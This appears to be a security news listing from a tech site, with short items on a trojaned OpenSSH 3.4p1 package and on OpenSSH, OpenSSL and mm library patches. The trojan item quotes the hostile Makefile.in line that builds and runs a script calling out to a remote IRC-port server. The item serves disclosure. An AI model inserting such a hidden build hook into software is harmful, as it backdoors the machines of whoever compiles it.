Trojan found in OpenSSH 3.4p1

Security 10944 Published by Philipp Esselbach 0

It seems like that the OpenSSH package on ftp.openbsd.org was trojaned. Thanks Palos.

"The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net)."

Read more

OpenSSH 3.4p1-PM4 for Cobalt RaQ 3/4

Security 10944 Published by Philipp Esselbach 0

PkgMaster has released a new OpenSSH package for Cobalt RaQ 3/4 and CacheRaQ4:

- OpenSSH enables you to connect securely (encrypted) to your Sun Cobalt appliance
- Contains both Client and Server software
- Statically compiled agains zlib 1.1.4 and openssl 0.9.6e
- PrivSep enabled for better security
- Compression enabled for better performance

Download

OpenSSL Remote Vulnerabilities

Security 10944 Published by Philipp Esselbach 0

A remotely exploitable buffer overflow has been found in OpenSSL

OpenSSL is a commercial-grade, full-featured, and Open Source toolkit which implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

Updates are available for:
Red Hat Linux
Mandrake Linux
Debian GNU/Linux
SuSE

mm Library Security Patch

Security 10944 Published by Philipp Esselbach 0

Marcus Meissner and Sebastian Krahmer discovered a temporary file vulnerability in the mm library which is used by the Apache webserver. This vulnerability can be exploited to obtain root privilege if shell access to the apache user (typically apache or nobody) is already obtained.

Updates are available for:
Red Hat Linux
Mandrake Linux
Debian GNU/Linux

OpenSSH 3.4p1-PM4 for Cobalt RaQ 1/2

Security 10944 Published by Philipp Esselbach 0

PkgMaster has released an OpenSSH 3.4p1-4 update for the MIPS based Cobalt RaQ 1/2 server appliances.

This release fix a major security vulnerability:

''At least one major security vulnerability exists in many deployed OpenSSH versions (2.3.1 to 3.3).

The 3.4 release contains many other fixes done over a week long audit started when this issue came to light. We believe that some of those fixes are likely to be important security fixes. Therefore, we urge an upgrade to 3.4.''

Download

Previous Page

Windows

Linux

macOS

Community

  • Lexonight
    Hey everyone,Wanted to share a project I've been b ...
  • SeveG
    need some help here... situationPC= Packard BellOS= win1 ...
  • dhamu
    Hello Phil, I have a Linux Tutorial website that curre ...